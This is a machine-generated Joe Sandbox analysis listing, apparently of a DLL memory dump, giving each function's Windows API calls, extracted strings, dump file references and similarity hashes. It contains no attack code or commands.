SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F894A39
VariantClear.OLEAUT32(?), ref: 6F894A45
SafeArrayDestroy.OLEAUT32(00000000), ref: 6F894B66
VariantClear.OLEAUT32(?), ref: 6F894B76
VariantClear.OLEAUT32(?), ref: 6F894B7C
VariantClear.OLEAUT32(6F8F05A8), ref: 6F894B82

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: a0e08615558af9ae0414cb083986e3270e653320bd01f8665e90df4a4e30119c
Instruction ID: bbbf420c45229ec13b9a9b004b7b2768780e2f0133c38418b17a2338a3507883
Opcode Fuzzy Hash: a0e08615558af9ae0414cb083986e3270e653320bd01f8665e90df4a4e30119c
Instruction Fuzzy Hash: 23513472900219AFDB04DFA8CC84EAEB7B9FF89310F14459AE915EB345D735E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F8947D0 Relevance: 15.2, APIs: 10, Instructions: 168COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6F89480C
VariantInit.OLEAUT32(?), ref: 6F894815
VariantInit.OLEAUT32(?), ref: 6F89481B
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F894826
SafeArrayPutElement.OLEAUT32(00000000,000000FF,?), ref: 6F89485B
VariantClear.OLEAUT32(?), ref: 6F894868
SafeArrayDestroy.OLEAUT32(00000000), ref: 6F894974
VariantClear.OLEAUT32(?), ref: 6F894984
VariantClear.OLEAUT32(?), ref: 6F89498A
VariantClear.OLEAUT32(?), ref: 6F894990

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 19e5814fc86010d695123f9c6874358ed669b9a9cce8fcd542c58e4d21b36b45
Instruction ID: 201c3c2f7a7617cadd4ef4dfcdf0b3990ce7aa0a52aa2c1b7464172c412da532
Opcode Fuzzy Hash: 19e5814fc86010d695123f9c6874358ed669b9a9cce8fcd542c58e4d21b36b45
Instruction Fuzzy Hash: FD515F72900249EFDB04DFA8CC84EAEB7B9FF89310F1485AEE515EB650D730A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F88DCD0 Relevance: 15.1, APIs: 10, Instructions: 138COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6F88DD00
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000003), ref: 6F88DD10
SafeArrayPutElement.OLEAUT32(00000000,6F892FFF,?), ref: 6F88DD47
VariantClear.OLEAUT32(?), ref: 6F88DD4F
SafeArrayPutElement.OLEAUT32(00000000,6F892FFF,?), ref: 6F88DD6D
SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6F88DDA4
VariantClear.OLEAUT32(?), ref: 6F88DDAC
SafeArrayDestroy.OLEAUT32(00000000), ref: 6F88DE16
SafeArrayDestroy.OLEAUT32(00000000), ref: 6F88DE27
VariantClear.OLEAUT32(?), ref: 6F88DE31

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Variant$ClearElement$Destroy$CreateInitVector
String ID:
API String ID: 3525949229-0
Opcode ID: 9698560615a439f966ef56b348d009063c3cf09163f90d485138f4fc4da74ac1
Instruction ID: bf3ef906466c10cdc817e6bad16b9cfade221deef7a0cd612d7ddc556b61165e
Opcode Fuzzy Hash: 9698560615a439f966ef56b348d009063c3cf09163f90d485138f4fc4da74ac1
Instruction Fuzzy Hash: 8D516F76901609AFDB01DFA4D884EDEBBB9FF99310F00855AE9259B310DB30E941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F8AC1B0 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 266COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F8AC213

Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D90ED
Part of subcall function 6F8D90D8: __CxxThrowException@8.LIBCMT ref: 6F8D9102
Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D9113

Strings

gfff, xrefs: 6F8AC259
gfff, xrefs: 6F8AC3F7
gfff, xrefs: 6F8AC222
gfff, xrefs: 6F8AC3A3
gfff, xrefs: 6F8AC1F2
gfff, xrefs: 6F8AC2EA
vector<T> too long, xrefs: 6F8AC20E

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$gfff$gfff$gfff$gfff$vector<T> too long
API String ID: 1823113695-1254974138
Opcode ID: 6f268a0ddd66b794e85178275b1b48e93f564aeb2501ec9b4ed2ca7ab3eb0466
Instruction ID: 1d03bb89dc44bad56d12ca21bebe6398766aaa93d637a2e4ef68c5093c1048aa
Opcode Fuzzy Hash: 6f268a0ddd66b794e85178275b1b48e93f564aeb2501ec9b4ed2ca7ab3eb0466
Instruction Fuzzy Hash: 1A916571A00609AFCB18CF5DDC90EAAB7B9EB88314F04865DE559DB784D731BA04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6F880CD0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F880D3A
std::_Xinvalid_argument.LIBCPMT ref: 6F880D60
_memmove.LIBCMT ref: 6F880D95
std::_Xinvalid_argument.LIBCPMT ref: 6F880DBF
_memmove.LIBCMT ref: 6F880E3E

Strings

string too long, xrefs: 6F880D5B, 6F880DBA
invalid string position, xrefs: 6F880D35

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 6c5672a318956b07b128904fbc3f315997b9f2c57223be98b7d3c250e4aeaaf4
Instruction ID: 91637e6071193c01c9fac703de208fb0c8eac4918a469f5c396ac4a37cea6809
Opcode Fuzzy Hash: 6c5672a318956b07b128904fbc3f315997b9f2c57223be98b7d3c250e4aeaaf4
Instruction Fuzzy Hash: 175182323061049BD724CE5CE990A5FB7A6EFC5714B209EAEE866CF385DB70EC418791

Uniqueness

Uniqueness Score: -1.00%

Function 6F8A1B20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 154libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6F8A1C5E
LoadLibraryW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6F8A1C69
GetProcAddress.KERNEL32(00000000,F1F2E532), ref: 6F8A1CA2
GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6F8A1CC1
LoadLibraryW.KERNEL32(kernel32.dll,?,00000000), ref: 6F8A1CCC
GetProcAddress.KERNEL32(00000000,EFF3E52B), ref: 6F8A1D0A

Strings

User32.dll, xrefs: 6F8A1C57, 6F8A1C64
kernel32.dll, xrefs: 6F8A1CBA, 6F8A1CC7

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID: User32.dll$kernel32.dll
API String ID: 310444273-1965990335
Opcode ID: bc5b6019cf1cc23db6f5e60597cf0a961e4d988bba9a1459d2d6092a8f65c646
Instruction ID: 1c27250e64c3d910db6ab645bddd22c4227eaffc018e6dd810c71e5e97e4d5b4
Opcode Fuzzy Hash: bc5b6019cf1cc23db6f5e60597cf0a961e4d988bba9a1459d2d6092a8f65c646
Instruction Fuzzy Hash: 83612B74104E009FD764CF58C591A6ABBF2FF86710FA08D98D4968FA42DB36E856CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6F8E4409 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 6F8E442E

Part of subcall function 6F8E3FC9: Replicator::operator[].LIBCMT ref: 6F8E404C
Part of subcall function 6F8E3FC9: DName::operator+=.LIBCMT ref: 6F8E4054

DName::operator+.LIBCMT ref: 6F8E4487
DName::DName.LIBCMT ref: 6F8E44DF

Strings

<ellipsis>, xrefs: 6F8E44C9, 6F8E44CE
,..., xrefs: 6F8E4473
,<ellipsis>, xrefs: 6F8E447A, 6F8E447F
void, xrefs: 6F8E44D7
..., xrefs: 6F8E44C2

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: 5876ce42837fac5616e741c0d3f4a9c6d7515297d7d92f952267483feb13d816
Instruction ID: 5789b5b59f3256abe700cbeb0742ffe849774d296002098ca93ceaf503465d3f
Opcode Fuzzy Hash: 5876ce42837fac5616e741c0d3f4a9c6d7515297d7d92f952267483feb13d816
Instruction Fuzzy Hash: E021A4B4B05505AFDB06CF58C4419997BF4BB873D9B0086E5E84ACF259C730E947CB64

Uniqueness

Uniqueness Score: -1.00%

Function 6F8E5D36 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 6F8E5D40
DName::DName.LIBCMT ref: 6F8E5D4C

Part of subcall function 6F8E3B3B: DName::doPchar.LIBCMT ref: 6F8E3B6C

UnDecorator::getScopedName.LIBCMT ref: 6F8E5D8B
DName::operator+=.LIBCMT ref: 6F8E5D95
DName::operator+=.LIBCMT ref: 6F8E5DA4
DName::operator+=.LIBCMT ref: 6F8E5DB0
DName::operator+=.LIBCMT ref: 6F8E5DBD

Strings

void, xrefs: 6F8E5D9C

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: 446311fe8081fc5766160ac1b2f44d1359bd8b9bd717222536a60283e215e4e8
Instruction ID: bb6a976cf35ebc5f954377fb70137a71b5951347bd0b79f8be48b2fd8848e4c0
Opcode Fuzzy Hash: 446311fe8081fc5766160ac1b2f44d1359bd8b9bd717222536a60283e215e4e8
Instruction Fuzzy Hash: CB119E70A04308AFD709CB6CC88AAEC7FB09B02305F0049E9D056DF2E1DB70AE46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6F893F10 Relevance: 13.7, APIs: 9, Instructions: 201COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F893F7B
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F893F8D
VariantInit.OLEAUT32(?), ref: 6F893FB7
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F893FD0
VariantClear.OLEAUT32(?), ref: 6F8940C9
VariantClear.OLEAUT32(?), ref: 6F894105
SafeArrayDestroy.OLEAUT32(?), ref: 6F894123
VariantClear.OLEAUT32(?), ref: 6F894157
VariantClear.OLEAUT32(?), ref: 6F894168

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Bound$DestroyElementInit
String ID:
API String ID: 758290628-0
Opcode ID: 1174c1e237e93077f75f9d86760353be8698a6988d1381a3ede6eff7a1bcaffd
Instruction ID: 7dd0ab473bcaf0339fd3854c5664c2bad4d2b81f1ce6ca7928a82e4917db312f
Opcode Fuzzy Hash: 1174c1e237e93077f75f9d86760353be8698a6988d1381a3ede6eff7a1bcaffd
Instruction Fuzzy Hash: 22716A766083419FC700DF68C8C495BBBE8BBD9350F108EAEF5A58B250D731E985CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F87FC30 Relevance: 13.7, APIs: 9, Instructions: 154fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(00000000,?,?,00000000,8E16AAE4), ref: 6F87FC98
CloseHandle.KERNEL32(FFFFFFFF,?,?,00000000,8E16AAE4), ref: 6F87FCAD
CloseHandle.KERNEL32(?,?,?,00000000,8E16AAE4), ref: 6F87FCB7
SetLastError.KERNEL32(00000000,?,?,00000000,8E16AAE4), ref: 6F87FCBA
CreateFileW.KERNEL32(?,-00000001,00000001,00000000,00000003,00000000,00000000,?,?,00000000,8E16AAE4), ref: 6F87FD01
GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,8E16AAE4), ref: 6F87FD14
GetLastError.KERNEL32(?,?,00000000,8E16AAE4), ref: 6F87FD2A
CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,8E16AAE4), ref: 6F87FD6B
MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000000,8E16AAE4), ref: 6F87FD98

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastView$MappingSizeUnmap
String ID:
API String ID: 1303881157-0
Opcode ID: eddf800e82ddd75c7dfd4913451d3d61c0a591307c64abf3667b0e82c73d4ddf
Instruction ID: e7d4b10c010a516e35a6584cf85deda38ed8a836699b6e54a1b72990ea3f914f
Opcode Fuzzy Hash: eddf800e82ddd75c7dfd4913451d3d61c0a591307c64abf3667b0e82c73d4ddf
Instruction Fuzzy Hash: 9F51A0B5604311AFDB148F39D884B5A7BA4AB89364F148AE9EC15CF2C5DB74E901CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6F8D42B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F8D42DD

Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D90ED
Part of subcall function 6F8D90D8: __CxxThrowException@8.LIBCMT ref: 6F8D9102
Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D9113

_memmove.LIBCMT ref: 6F8D4363
_memmove.LIBCMT ref: 6F8D4381
_memmove.LIBCMT ref: 6F8D43E6
_memmove.LIBCMT ref: 6F8D4453
_memmove.LIBCMT ref: 6F8D4474

Strings

vector<T> too long, xrefs: 6F8D42D8

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 4034224661-3788999226
Opcode ID: 15875650164e4a7d5a786f763595b08c6ae18565884688fad9585ead55e85300
Instruction ID: 8d981e91fdcf98e5fbfcae57b15ce6d4d8ea490cce7c61a64bf2723a91c3bfb7
Opcode Fuzzy Hash: 15875650164e4a7d5a786f763595b08c6ae18565884688fad9585ead55e85300
Instruction Fuzzy Hash: B9516CB26043069FD718CF68DC85D6BB7E5EFD4214F184E6DF886C7384E671E9048AA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F8A4B60 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 143COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F8A4BC8
std::_Xinvalid_argument.LIBCPMT ref: 6F8A4BE0
std::_Xinvalid_argument.LIBCPMT ref: 6F8A4BFA
_memmove.LIBCMT ref: 6F8A4C64
_memmove.LIBCMT ref: 6F8A4C81

Strings

string too long, xrefs: 6F8A4BDB, 6F8A4BF5
invalid string position, xrefs: 6F8A4BC3

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 7c933689222e6f784b749b5a4530a39589fc4c5a9707bf0ee4058d706fd2b9e8
Instruction ID: 5c7d6728dbbfddefc26be44037c7e9a68608e327ca368b2973eede67e5e611c3
Opcode Fuzzy Hash: 7c933689222e6f784b749b5a4530a39589fc4c5a9707bf0ee4058d706fd2b9e8
Instruction Fuzzy Hash: AD4184323046149BDB24CE5C9980B5EF3E6FBD5614B200E9FE0558F6A5DF72AC468351

Uniqueness

Uniqueness Score: -1.00%

Function 6F88FFEA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Strings

RSDi, xrefs: 6F890075

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

